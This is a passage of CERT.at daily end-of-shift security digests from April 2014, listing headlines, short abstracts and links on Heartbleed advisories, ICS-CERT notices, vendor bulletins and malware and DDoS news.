TLS/DTLS Heartbeat Two Information Disclosure Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/58022 *** Global Technology Associates GB-OS OpenSSL TLS/DTLS Heartbeat Two Information Disclosure Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/58007 *** Certec atvise scada OpenSSL Heartbleed Vulnerability *** --------------------------------------------- Researcher Bob Radvanovsky of Infracritical has notified NCCIC/ICS-CERT that Certec has released new libraries that mitigate the OpenSSL Heartbleed vulnerability in atvise scada.This vulnerability could be exploited remotely. Exploits that target the OpenSSL Heartbleed vulnerability are known to be publicly available. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-114-01 *** Siemens SIMATIC S7-1200 CPU Web Vulnerabilities *** --------------------------------------------- Siemens ProductCERT and Ralf Spenneberg, Hendrik Schwartke, and Maik Brüggemann from OpenSource Training have reported two vulnerabilities in the Siemens SIMATIC S7-1200 CPU family. Siemens has produced a new product release that mitigates these vulnerabilities. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-114-02 *** InduSoft Web Studio Directory Traversal Vulnerability *** --------------------------------------------- This advisory was originally posted to the US-CERT secure Portal library on April 17, 2014, and is now being released to the NCCIC/ICS-CERT web site. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-107-02 *** Festo CECX-X-(C1/M1) Controller Vulnerabilities *** --------------------------------------------- K. Reid Wightman of IOActive, Inc. has identified vulnerabilities in Festo’s CECX-X-C1 and CECX-X-M1 controllers. Festo has decided not to resolve these vulnerabilities because of compatibility reasons with existing engineering tools. This places critical infrastructure asset owners using this product at risk. This advisory is being published to alert critical infrastructure asset owners of the risk of using this equipment and for them to increase compensating measures if possible. --------------------------------------------- http://ics-cert.us-cert.gov/advisories/ICSA-14-084-01 *** Oracle Solaris ntpd Query Function Lets Remote Users Conduct Amplified Denial of Service Attacks *** --------------------------------------------- http://www.securitytracker.com/id/1030142 *** Synology DiskStation Manager cUrl Connection Re-use and Certificate Verification Security Issues *** --------------------------------------------- https://secunia.com/advisories/58145 *** SSA-635659 (Last Update 2014-04-25): Heartbleed Vulnerability in Siemens Industrial Products *** --------------------------------------------- https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit… *** Halon Security Router Multiple Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/57507 *** HP Security Bulletins *** --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_…

1 0

Tageszusammenfassung - Donnerstag 24-04-2014
by Daily end-of-shift report 24 Apr '14

24 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Mittwoch 23-04-2014 18:00 − Donnerstag 24-04-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** NetSupport Information Leakage Using Nmap Script *** --------------------------------------------- NetSupport allows corporations to remotely manage and connect to PCs and servers from a central location for the purposes of desktop support. In my last post I discussed how I wrote a script using the NetSupport scripting language to find versions of NetSupport running on clients with default installations that didnt require authentication to remotely connect to them. Essentially you could use NetSupport to bypassany Domain or local credentials to remotely connect to the PC and... --------------------------------------------- http://blog.spiderlabs.com/2014/04/netsupport-information-leakage-using-nma… *** DHCPv6 and DUID Confusion, (Wed, Apr 23rd) *** --------------------------------------------- In IPv6, DHCP is taking somewhat a back seat to router advertisements. Many smaller networks are unlikely to use DHCP. However, in particular for Enterprise/larger networks, DHCPv6 still offers a lot of advantages when it comes to managing hosts and accounting for IP addresses in use. One of the big differences when it comes to DHCPv6 is that a host identifies itself with a DUID (DHCP Unique Identifier) which can be different from a MAC address. There are essentially three ways to come up with... --------------------------------------------- http://isc.sans.edu/diary.html?storyid=18015&rss *** Cisco: Hey, IT depts. Youre all malware hosts *** --------------------------------------------- Security report also notes skills shortage Everybody - at least every multinational that Cisco checked out for its 2014 Annual Security Report - is hosting malware of some kind, and there arent enough security professionals to go around. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/04/24/cisco_youre… *** DrDoS attacks to reach 800 Gbps in 2015 *** --------------------------------------------- While the network time protocol (NTP) DrDoS threats that became prevalent in early 2014 have been contained, new distributed reflected denial of service threats will lead to attacks in excess of 800 Gbps during the next 12 to 18 months. --------------------------------------------- http://www.net-security.org/secworld.php?id=16733 *** Zero-Day-Lücke in Apache Struts 2 *** --------------------------------------------- Durch eine kleine Abwandlung einer bereits gepatchten Lücke können Angreifer wieder Code in den Server einschleusen. --------------------------------------------- http://www.heise.de/security/meldung/Zero-Day-Luecke-in-Apache-Struts-2-217… *** Situational Awareness Alert for OpenSSL Vulnerability (Update D) *** --------------------------------------------- This alert update is a follow-up to the updated NCCIC/ICS-CERT Alert titled ICS-ALERT-14-009-01C Situational Awareness Alert for OpenSSL Vulnerability that was published April 17, 2014, on the ICS-CERT web site. --------------------------------------------- http://ics-cert.us-cert.gov/alerts/ICS-ALERT-14-099-01D *** Drupal - Vulnerabilities in Third-Party Modules *** --------------------------------------------- https://drupal.org/node/2248073 https://drupal.org/node/2248077 https://drupal.org/node/2248145 https://drupal.org/node/2248171 *** Attachmate Reflection OpenSSL TLS Heartbeat Buffer Overread Lets Remote Users Obtain Potentially Sensitive Information *** --------------------------------------------- http://www.securitytracker.com/id/1030144 *** Bugtraq: Weak firmware encryption and predictable WPA key on Sitecom routers *** --------------------------------------------- http://www.securityfocus.com/archive/1/531920 *** SSA-892012 (Last Update 2014-04-24): Web Vulnerabilities in SIMATIC S7-1200 CPU *** --------------------------------------------- https://www.siemens.com/innovation/pool/de/forschungsfelder/siemens_securit… *** Vuln: Check_MK Multiple Vulnerabilities *** --------------------------------------------- http://www.securityfocus.com/bid/66389 http://www.securityfocus.com/bid/66391 http://www.securityfocus.com/bid/66394 http://www.securityfocus.com/bid/66396 *** Notice: (Revision) CUSTOMER ATTENTION REQUIRED: HP Integrated Lights-Out and Integrated Lights-Out 2 - Scanning First-Generation iLO or iLO 2 Devices for the Heartbleed Vulnerability Results in iLO Lockup Requiring Power to be PHYSICALLY Removed *** --------------------------------------------- The first-generation iLO and iLO 2 products use the RSA SSL libraries and there is a bug in these libraries that will cause first-generation iLO and iLO 2 devices to enter a live lockup situation when a vulnerability scanner runs to check for the Heartbleed vulnerability. Although the servers operating system will continue to function normally, first-generation iLO and iLO 2 will no longer be responsive over the management network. --------------------------------------------- http://h20565.www2.hp.com/portal/site/hpsc/template.PAGE/public/kb/docDispl… *** HPSBHF03006 rev.1 - HP Integrated Lights-Out 2 (iLO 2) Denial of Service *** --------------------------------------------- A potential security vulnerability has been identified in HP Integrated Lights-Out 2 (iLO 2) servers that allows for a Denial of Service. The denial of service condition occurs only when the iLO 2 is scanned by vulnerability assessment tools that test for CVE-2014-0160 (Heartbleed vulnerability). --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** HP Security Bulletins for CVE 2014-0160 *** --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** Vuln: EMC Connectrix Manager Converged Network Edition Remote Information Disclosure Vulnerability *** --------------------------------------------- http://www.securityfocus.com/bid/66308

1 0

Tageszusammenfassung - Mittwoch 23-04-2014
by Daily end-of-shift report 23 Apr '14

23 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Dienstag 22-04-2014 18:00 − Mittwoch 23-04-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Wartungsarbeiten Mailing-Listen-Server 24. April 2014 *** --------------------------------------------- Am Nachmittag des 24. April werden wir Wartungsarbeiten an unserem Mailing-Listen-Server (lists.cert.at) durchführen. Auswirkungen: verzögerte Zustellung von Listen-Mails Administrations-Interface (Subscribe/Unsubscribe etc.) der Mailing-Listen nicht verfügbar Mailing-Listen-Archive nicht verfügbar. Wir werden uns bemühen, die Ausfälle so kurz wie möglich zu halten, können jedoch keine genaue... --------------------------------------------- http://www.cert.at/services/blog/20140423085410-1134.html *** DBIR: Poor Patching, Weak Credentials Open Door to Data Breaches *** --------------------------------------------- Weak or default credentials, poor configurations and a lack of patching are common denominators in most data breaches, according to the 2014 Verizon Data Breach Investigations Report. --------------------------------------------- http://threatpost.com/dbir-poor-patching-weak-credentials-open-door-to-data… *** Millions Feedly users vulnerable to Javascript Injection attack *** --------------------------------------------- A security researcher discovered a serious Javascript Injection vulnerability in the popular Feedly Android App impacting Millions Users. --------------------------------------------- http://securityaffairs.co/wordpress/24209/hacking/feedly-javascript-vulnera… *** Apple stopft Sicherheitslücken in iOS, OS X und WLAN-Basisstationen *** --------------------------------------------- Die Updates sollen kritische Schwachstellen in Apples Betriebssystemen beseitigen - darunter eine weitere Lücke, die das Ausspähen von SSL-Verbindungen erlaubt. Für die AirPort-Stationen steht ein Heartbleed-Fix bereit. --------------------------------------------- http://www.heise.de/security/meldung/Apple-stopft-Sicherheitsluecken-in-iOS… *** Operation Francophoned: The Persistence and Evolution of a Dual-Pronged Social Engineering Attack *** --------------------------------------------- Operation Francophoned, first uncovered by Symantec in May 2013, involved organizations receiving direct phone calls and spear phishing emails impersonating a known telecommunication provider in France, all in an effort to install malware and steal information and ultimately money from targets. --------------------------------------------- http://www.symantec.com/connect/blogs/operation-francophoned-persistence-an… *** Blog: An SMS Trojan with global ambitions *** --------------------------------------------- Recently, we’ve seen SMS Trojans starting to appear in more and more countries. One prominent example is Trojan-SMS.AndroidOS.Stealer.a: this Trojan came top in Kaspersky Lab's recent mobile malware ТОР 20. It can currently send short messages to premium-rate numbers in 14 countries around the world. --------------------------------------------- http://www.securelist.com/en/blog/8209/An_SMS_Trojan_with_global_ambitions *** ISC stellt Entwicklung an seinem BIND10-DNS-Server ein *** --------------------------------------------- Das Unternehmen hat die letzte von ihm entwickelte Version veröffentlicht und zieht sich aus der weiteren Entwicklung zurück. Dabei sollte BIND10 ursprünglich BIND9 ablösen, das seinerzeit Hochleistungs-Server nur unzureichend ausschöpfen konnte. --------------------------------------------- http://www.heise.de/newsticker/meldung/ISC-stellt-Entwicklung-an-seinem-BIN… *** Nine patterns make up 92 percent of security incidents *** --------------------------------------------- Verizon security researchers have found that 92 percent of the 100,000 security incidents analyzed over the past ten years can be traced to nine basic attack patterns that vary from industry to industry. --------------------------------------------- http://www.net-security.org/secworld.php?id=16725 *** Dissecting the unpredictable DDoS landscape *** --------------------------------------------- DDoS attacks are now more unpredictable and damaging than ever, crippling websites, shutting down operations, and costing millions of dollars in downtime, customer support and brand damage, according to Neustar. --------------------------------------------- http://www.net-security.org/secworld.php?id=16726 *** Special Edition of OUCH: Heartbleed - Why Do I Care? http://www.securingthehuman.org/newsletters/ouch/issues/OUCH-2014-special_e…, (Wed, Apr 23rd) *** --------------------------------------------- -- Alex Stanford - GIAC GWEB, Research Operations Manager, SANS Internet Storm Center (c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License. --------------------------------------------- http://isc.sans.edu/diary.html?storyid=18013&rss *** Apple splats new SSL snooping bug in iOS, OS X - but its no Heartbleed *** --------------------------------------------- Triple-handshake flaw stalks Macs and iThings Apple has squashed a significant security bug in its SSL engine for iOS and OS X as part of a slew of patches for iThings and Macs. --------------------------------------------- http://go.theregister.com/feed/www.theregister.co.uk/2014/04/23/apple_ssl_u… *** Joomla Plugin Constructor Backdoor *** --------------------------------------------- We recently wrote about backdoors in pirated commercial WordPress plugins. This time it will be a short post about an interesting backdoor we found in a Joomla plugin. It was so well organized that at first we didn't realize there was a backdoor even though we knew something was wrong. That's how the code of... --------------------------------------------- http://blog.sucuri.net/2014/04/joomla-plugin-constructor-backdoor.html *** Citrix Security Advisory for CVE-2014-0160, aka the Heartbleed vulnerability *** --------------------------------------------- A vulnerability has been recently disclosed in OpenSSL that could result in remote attackers being able to obtain sensitive data from the process address space of a vulnerable OpenSS... --------------------------------------------- http://support.citrix.com/article/CTX140605 *** IBM PSIRT - OpenSSL Heartbleed (CVE-2014-0160) *** --------------------------------------------- We will continue to update this blog to include information about products. The following is a list of products affected by the Heartbleed vulnerability. Please follow the links below to view the security bulletins for the affected products. --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/openssl_heartbleed_cv… *** Information on Norton products and the Heartbleed vulnerability *** --------------------------------------------- This article answers many of the questions that are currently being asked about the Heartbleed bug and the role that Norton products play in defending against this attack. --------------------------------------------- https://support.norton.com/sp/en/us/home/current/solutions/v98431836_EndUse… *** OpenSSL Security Vulnerability - aka. "Heartbleed Bug" - CVE-2014-0160 - Security Incident Response for D-Link Devices and Services *** --------------------------------------------- D-Link is investigating all devices and systems that utilize the OpenSSL software library to determine if our devices and customers are affected by this security vulnerability. You will find current status below and can contact us at security(a)dlink.com about specific questions. --------------------------------------------- http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10022 *** Heartbleed Vulnerability in Various Products *** --------------------------------------------- http://tomcat.apache.org/native-doc/news/2014.html http://tomcat.apache.org/native-doc/miscellaneous/changelog.html http://www.fortiguard.com/advisory/FG-IR-14-011/ http://www.sybase.com/detail?id=1099387 https://secunia.com/advisories/58188 (Symantec Multiple Products) https://secunia.com/advisories/58148 (Xerox WorkCentre 3315/3325) *** VU#350089: IBM Notes and Domino on x86 Linux specify an executable stack *** --------------------------------------------- Vulnerability Note VU#350089 IBM Notes and Domino on x86 Linux specify an executable stack Original Release date: 22 Apr 2014 | Last revised: 22 Apr 2014 Overview IBM Notes and Domino on x86 Linux are incorrectly built requesting an executable stack. This can make it easier for attackers to exploit vulnerabilities in Notes, Domino, and any of the child processes that they may spawn. Description The build environment for the x86 Linux versions of IBM Notes and Domino incorrectly specified the... --------------------------------------------- http://www.kb.cert.org/vuls/id/350089 *** Cisco ASA SIP Inspection Memory Leak Vulnerability *** --------------------------------------------- A vulnerability in the Session Initiation Protocol (SIP) inspection engine code could allow an unauthenticated, remote attacker to cause a slow memory leak, which may cause instability on the affected system. --------------------------------------------- http://tools.cisco.com/security/center/content/CiscoSecurityNotice/CVE-2014… *** AirPort Extreme and AirPort Time Capsule OpenSSL TLS Heartbeat Buffer Overread Lets Remote Users Obtain Potentially Sensitive Information *** --------------------------------------------- http://www.securitytracker.com/id/1030132 *** Apple OS X Multiple Bugs Let Remote Users Execute Arbitrary Code and Deny Service and Local Users Gain Elevated Privileges *** --------------------------------------------- http://www.securitytracker.com/id/1030133 *** Sixnet Sixview 2.4.1 Directory Traversal *** --------------------------------------------- Topic: Sixnet Sixview 2.4.1 Directory Traversal Risk: Medium Text:#Exploit Title: Sixnet sixview web console directory traversal #Date: 2014-04-21 #Exploit Author: daniel svartman #Vendor Ho... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014040150 *** Parallels Plesk Panel 12.x Key Disclosure *** --------------------------------------------- Topic: Parallels Plesk Panel 12.x Key Disclosure Risk: High Text:While auditing the source code for Parallels Plesk Panel 12.x on Linux I noticed the following feature that leads to leakage o... --------------------------------------------- http://cxsecurity.com/issue/WLB-2014040151 *** [2014-04-23] Path Traversal/Remote Code Execution in WD Arkeia Network Backup Appliances *** --------------------------------------------- An unauthenticated remote attacker can exploit the identified Path Traversal vulnerability in order to retrieve arbitrary files from the affected WD Arkeia Network Backup appliances and execute system commands. --------------------------------------------- https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/2014… *** Security Advisory-Improper Input Validation Vulnerability on Multiple Quidway Switch Products *** --------------------------------------------- Once exploited, the vulnerability might cause a excessive resource (e.g. memory) consumption of the vulnerable system and even cause the system to restart in serious cases. --------------------------------------------- http://www.huawei.com/en/security/psirt/security-bulletins/security-advisor… *** HP Security Bulletins *** --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** Security Advisories Relating to Symantec Products - Symantec Messaging Gateway Management Console Reflected XSS *** --------------------------------------------- Symantec's Messaging Gateway management console is susceptible to a reflected cross-site scripting (XSS) issue found in one of the administrative interface pages. Successful exploitation could result in potential session hijacking or unauthorized actions directed against the console with the privileges of the targeted user's browser. --------------------------------------------- http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=se… *** Security Bulletin: IBM Sterling Order Management is affected by Cross Site Scripting (XSS) Vulnerability (CVE-2014-0932) *** --------------------------------------------- IBM Sterling Order Management is vulnerable to a cross-site scripting attack which could lead to unauthorized access through the injected scripts. --------------------------------------------- http://www-01.ibm.com/support/docview.wss?uid=swg21670912 *** Django Security Issue and Multiple Vulnerabilities *** --------------------------------------------- A security issue and multiple vulnerabilities have been reported in Django, which can be exploited by malicious people to potentially disclose certain sensitive information, manipulate certain data, and compromise a vulnerable system. --------------------------------------------- https://secunia.com/advisories/58201 *** Hitachi Multiple Cosminexus / uCosminexus Products Java Multiple Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/58197 *** Hitachi Multiple Cosminexus / uCosminexus Products SSL/TLS Initialization Vector Selection Weakness *** --------------------------------------------- https://secunia.com/advisories/58240

1 0

Tageszusammenfassung - Dienstag 22-04-2014
by Daily end-of-shift report 22 Apr '14

22 Apr '14

======================= = Heartbleed Report = = a.k.a = = End-of-Shift report = ======================= Timeframe: Freitag 18-04-2014 18:00 − Dienstag 22-04-2014 18:00 Handler: Stephan Richter Co-Handler: n/a *** Amplification, reflection DDoS attacks increase 35 percent in Q1 2014 *** --------------------------------------------- The Q1 2014 Global DDoS Attack Report reveals that amplification and reflection distributed denial-of-service attacks are on the rise. --------------------------------------------- http://feedproxy.google.com/~r/SCMagazineHome/~3/GljZsrx9WMs/ *** Das Router-Desaster: Fritzbox-Update gerät ins Stocken *** --------------------------------------------- Aktuelle Scan-Ergebnisse belegen, dass die Verbreitung des kritischen Sicherheits-Updates kaum voranschreitet. In vielen Fällen werden verwundbare Fritzboxen sogar noch mit aktivem Fernzugriff betrieben - eine gefährliche Mischung. --------------------------------------------- http://www.heise.de/security/meldung/Das-Router-Desaster-Fritzbox-Update-ge… *** Home entertainment implementations are pretty appaling *** --------------------------------------------- I picked up a Panasonic BDT-230 a couple of months ago. Then I discovered that even though it appeared fairly straightforward to make it DVD region free (I have a large pile of PAL region 2 DVDs), the US models refuse to play back PAL content. We live in an era of software-defined functionality. While Panasonic could have designed a separate hardware SKU with a hard block on PAL output, that would seem like unnecessary expense. So, playing with the firmware seemed like a reasonable... --------------------------------------------- http://mjg59.dreamwidth.org/31178.html *** OpenSSL Rampage, (Mon, Apr 21st) *** --------------------------------------------- OpenSSL, in spite of its name, isnt really a part of the OpenBSD project. But as one of the more positive results of the recent Heartbleed fiasco, the OpenBSD developers, who are known for their focus on readable and secure code, have now started a full-scale review and cleanup of the OpenSSL codebase. If you are interested in writing secure code in C (not necessarily a contradiction in terms), I recommend you take a look at http://opensslrampage.org/archive/2014/4, where the OpenBSD-OpenSSL... --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17997&rss *** Mysterious iOS malware campaign has Chinese origins *** --------------------------------------------- The threat, dubbed "Unflod Baby Panda," was discovered by Reddit users and analyzed by researchers at the German-based security firm, SektionEins. --------------------------------------------- http://feedproxy.google.com/~r/SCMagazineHome/~3/_EB9Qixb5Vk/ *** Easter egg: DSL router patch merely hides backdoor instead of closing it *** --------------------------------------------- Researcher finds secret "knock" opens admin for some Linksys, Netgear routers. --------------------------------------------- http://feeds.arstechnica.com/~r/arstechnica/security/~3/MBqOOgJa9Ng/ *** Feedly fixes Android JavaScript code injection flaw, deems it "harmless" *** --------------------------------------------- A researcher wrote about a bug in the Android app for news aggregator Feedly that could enable JavaScript code injection, but even though it was fixed, the company did not really consider it a vulnerability. --------------------------------------------- http://feedproxy.google.com/~r/SCMagazineHome/~3/lZyhHF8qR8o/ *** Report: Google looks to integrate PGP with Gmail *** --------------------------------------------- Pretty Good Privacy, or PGP, is an encryption method that was created in the early 90s. --------------------------------------------- http://feedproxy.google.com/~r/SCMagazineHome/~3/pxVEyRndi7A/ *** Weekly Metasploit Update: Heartbleed and Firefox Passwords *** --------------------------------------------- https://community.rapid7.com/community/metasploit/blog/2014/04/17/weekly-me… *** Critical update makes P2P Zeus trojan even tougher to remove *** --------------------------------------------- An update to the P2P Zeus banking trojan results in the installation of a rootkit driver that makes deleting the malware even tougher. --------------------------------------------- http://feedproxy.google.com/~r/SCMagazineHome/~3/EIQ5YrV1__8/ *** Sicherheitslücke beim Netzwerkmonitor Nagios *** --------------------------------------------- Der "Nagios Remote Plugin Executor" führt unter Umständen eingeschleuste Befehle aus. Diese Umstände deuten allerdings schon auf eine generell unsichere Konfiguration hin. --------------------------------------------- http://www.heise.de/security/meldung/Sicherheitsluecke-beim-Netzwerkmonitor… *** Ein Viertel der Internetnutzer wechselt nie die Passwörter *** --------------------------------------------- Trotz Heartbleed wechselt weiterhin rund ein Viertel aller deutschen Internetnutzer nie ihr Passwort. Ein Drittel der Befragten verwendet ein Passwort auf mehreren Plattformen. --------------------------------------------- http://futurezone.at/digital-life/ein-viertel-der-internetnutzer-wechselt-n… *** Heartbleed und das Sperrproblem von SSL *** --------------------------------------------- Nach dem Beseitigen des Heartbleed-Problems sperrten viele Admins vorsorglich ihre SSL-Zertifikate und besorgten sich neue. Trotzdem bedeuten geklaute Server-Schlüssel auch weiterhin ein Problem - denn das Sperren funktioniert eigentlich nicht. --------------------------------------------- http://www.heise.de/security/meldung/Heartbleed-und-das-Sperrproblem-von-SS… *** OpenSSL ssl3_read_bytes denial of service *** --------------------------------------------- http://xforce.iss.net/xforce/xfdb/92632 *** Alert for CVE-2014-0160 *** --------------------------------------------- This Security Alert addresses CVE-2014-0160 ('Heartbleed'), a publicly disclosed vulnerability which affects multiple OpenSSL versions implemented by various vendors in their products. This vulnerability affects multiple Oracle products. This vulnerability may be remotely exploitable without authentication, i.e. it may be exploited over a network without the need for a username and password. A remote user can exploit this vulnerability to impact the confidentiality of systems that are running affected versions of OpenSSL. According to http://heartbleed.com, the compromised data may contain passwords, private keys, and other sensitive information. In some instances, this information could be used by a malicious attacker to log into systems using a stolen identity or decrypt private information that was sent months or years ago. --------------------------------------------- http://www.oracle.com/technetwork/topics/security/alert-cve-2014-0160-21907… *** Winamp Buffer Overflow and Pointer Dereference Bugs Let Remote Users Execute Arbitrary Code *** --------------------------------------------- http://www.securitytracker.com/id/1030107 *** VMSA-2014-0004.6 *** --------------------------------------------- VMware product updates address OpenSSL security vulnerabilities --------------------------------------------- http://www.vmware.com/security/advisories/VMSA-2014-0004.html *** F5 - Various Vulnerabilities in Multiple Products *** --------------------------------------------- https://secunia.com/advisories/58157 https://secunia.com/advisories/58159 https://secunia.com/advisories/58154 https://secunia.com/advisories/58160 *** Check Point Mobile VPN for iOS and for Android OpenSSL Heartbeat Two Information Disclosure Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/57947 *** VU#622950: Toshiba Global Commerce Solutions 4690 Point of Sale operating system contains a password hashing algorithm that can be reversed *** --------------------------------------------- Vulnerability Note VU#622950 Toshiba Global Commerce Solutions 4690 Point of Sale operating system contains a password hashing algorithm that can be reversed Original Release date: 21 Apr 2014 | Last revised: 21 Apr 2014 Overview Toshiba Global Commerce Solutions 4690 Point of Sale operating system contains a password hashing algorithm that can be reversed. (CWE-328) Description Toshiba Global Commerce Solutions 4690 Point of Sale operating system contains a password hashing algorithm that --------------------------------------------- http://www.kb.cert.org/vuls/id/622950 *** Bugzilla Input Validation Flaw Permits Cross-Site Request Forgery Attacks *** --------------------------------------------- http://www.securitytracker.com/id/1030128 *** SonicWALL Multiple Products OpenSSL TLS/DTLS Heartbeat Two Information Disclosure Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/58146 *** CA Multiple Products OpenSSL TLS/DTLS Heartbeat Information Disclosure Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/58019 *** Tenable SecurityCenter OpenSSL TLS/DTLS Heartbeat Two Information Disclosure Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/58182 *** IBM OS/400 Weakness and Multiple Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/57826 *** ADTRAN Multiple Products OpenSSL TLS/DTLS Heartbeat Two Information Disclosure Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/58172 *** Vulnerabilities in multiple HP Products *** --------------------------------------------- https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay?docId=emr_… *** BlackBerry Enterprise Service OpenSSL TLS/DTLS Heartbeat Two Information Disclosure Vulnerabilities *** --------------------------------------------- https://secunia.com/advisories/58244 *** IBM Security Bulletins *** --------------------------------------------- https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ds8… https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm… https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ope… https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… https://www-304.ibm.com/connections/blogs/PSIRT/entry/title_ibm_endpoint_ma… https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_pow… https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… https://www-304.ibm.com/connections/blogs/PSIRT/entryhttps://www-304.ibm.co… https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_fle… https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… https://www-304.ibm.com/connections/blogs/PSIRT/entry/ibm_security_bulletin… https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ts3… https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_pow… https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm… https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_ibm… https://www-304.ibm.com/connections/blogs/PSIRT/entry/security_bulletin_san…

1 0

Tageszusammenfassung - Freitag 18-04-2014
by Daily end-of-shift report 18 Apr '14

18 Apr '14

======================= = End-of-Shift report = ======================= Timeframe: Donnerstag 17-04-2014 18:00 − Freitag 18-04-2014 18:00 Handler: Alexander Riepl Co-Handler: Stephan Richter *** Looking for malicious traffic in electrical SCADA networks - part 2 - solving problems with DNP3 Secure Authentication Version 5, (Thu, Apr 17th) *** --------------------------------------------- I received this week a very valuable e-mail from the DNP Technical Committee Chair, Mr. Adrew West, who pointed an excellent observation and its the very slow adoption of DNP3 Secure Authentication Version 5, which is the latest security enhancement for the DNP3 protocol. I want to talk today about this standard and the advantages of adopting it into your DNP3 SCADA system. This standard has two specific objectives: Help DNP3 outstation to determine beyond any reasonable doubt that its... --------------------------------------------- http://isc.sans.edu/diary.html?storyid=17981&rss *** Heartbleed Bug Sends Bandwidth Costs Skyrocketing *** --------------------------------------------- The exposure of the Heartbleed vulnerability last week had a number of repercussions, one of which was to set off a mad scramble by companies to revoke the SSL certificates for their domains and services and obtain new ones. The total costs of Heartbleed are yet to be calculated, but CloudFlare has come up with... --------------------------------------------- http://feeds.wired.com/c/35185/f/661467/s/397cb2f7/sc/5/l/0L0Swired0N0C20A1… *** Heartbleed bereitet Anonymisierungsnetzwerk Tor Schwierigkeiten *** --------------------------------------------- Rund ein Fünftel der Exit Nodes von OpenSSL-Lücke betroffen - Vorschlag diese aus dem Netz zu werfen... --------------------------------------------- http://derstandard.at/1397520979826 *** Mac OS X Trojans display ads *** --------------------------------------------- April 16, 2014 Malicious programs designed to generate a profit for intruders by displaying annoying ads are very common, but until recently they have mostly been a nuisance for Windows users. Thats why a few Trojans that were recently examined by Doctor Webs security researchers stand out among such applications... --------------------------------------------- 